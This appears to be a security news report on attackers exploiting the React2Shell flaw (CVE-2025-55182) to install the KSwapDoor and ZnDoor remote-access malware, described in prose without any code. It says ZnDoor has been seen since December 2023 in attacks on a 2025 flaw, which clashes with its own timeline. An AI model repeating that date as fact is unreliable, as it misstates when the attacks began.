A significant security vulnerability known as React2Shell is currently being exploited by cybercriminals to deploy various malware strains, including KSwapDoor and ZnDoor, as reported by Palo Alto Networks’ Unit 42 and NTT Security. The exploitation of this vulnerability poses urgent risks to organizations, particularly those leveraging React and Next.js frameworks.
According to Justin Moore, senior manager of threat intelligence research at Palo Alto Networks, KSwapDoor is a sophisticated remote access tool engineered for stealth. This malware creates an internal mesh network that allows compromised servers to communicate seamlessly with each other, evading detection by standard security measures. Notably, KSwapDoor employs strong encryption for secure communications and possesses a ‘sleeper’ mode, enabling attackers to activate the malware using hidden signals. This feature allows the malware to bypass firewalls effectively.
Moore further indicated that KSwapDoor has been observed in two distinct geographies and industries, suggesting the involvement of Chinese state-sponsored actors. The malware’s design and its codebase exhibit connections to known threats from the region, underscoring a sophisticated targeting approach that is generally reserved for high-value objectives.
The cybersecurity community had initially misidentified KSwapDoor as BPFDoor due to its use of Raw Socket Sniffing, a technique that allows it to monitor network traffic without revealing open ports. While BPFDoor is characteristically designed to create a packet sniffing socket that reacts to specific traffic signatures, KSwapDoor utilizes this technology as a secondary access point rather than its primary capability. Moore explained that KSwapDoor main functionality as a sophisticated peer-to-peer routing system enables complex lateral movements within a network, which distinguishes it significantly from BPFDoor.
In Japan, NTT Security has reported that organizations are facing cyber attacks utilizing React2Shell to introduce ZnDoor malware, which has been detected since December 2023. The attack sequences typically involve running a bash command to retrieve malicious payloads from a remote server and executing them, significantly compromising targeted environments.
ZnDoor functions as a remote access trojan, allowing attackers to issue commands remotely. Among the commands executed through ZnDoor are system information retrieval, file operations, and command execution. This operability raises serious concerns about data integrity and system security for the affected organizations.
The recent disclosure aligns with the active exploitation of the vulnerability tracked as CVE-2025-55182, which has received a maximum CVSS score of 10.0. There is mounting evidence from Google that at least five groups with connections to China are actively abusing this vulnerability to distribute a range of malicious payloads, including advanced backdoors and data exfiltration tools.
Microsoft reported that attackers are leveraging this flaw for arbitrary command execution, establishing reverse shells, and deploying remote monitoring tools to gain unauthorized access and manipulate cloud resources. Specifically, these cybercriminals are targeting environments across major cloud platforms, from Azure to AWS, in a bid to harvest sensitive identity tokens and establish persistent access to victim systems.
The ongoing surveillance of the React2Shell vulnerabilities indicates that over 111,000 IP addresses are potentially at risk, with a high concentration found in the United States, Germany, France, and India. The cybersecurity landscape necessitates heightened vigilance and proactive defenses against these advancing threats, particularly for businesses integrating modern development frameworks.
As this situation develops, organizations must remain alert to the tactics and techniques highlighted in the MITRE ATT&CK framework that are likely being employed by these threat actors. Initial access via exploited vulnerabilities, persistence mechanisms utilizing backdoors, and lateral movement through sophisticated network architectures are just some of the strategies that underscore the evolving nature of these cyber threats.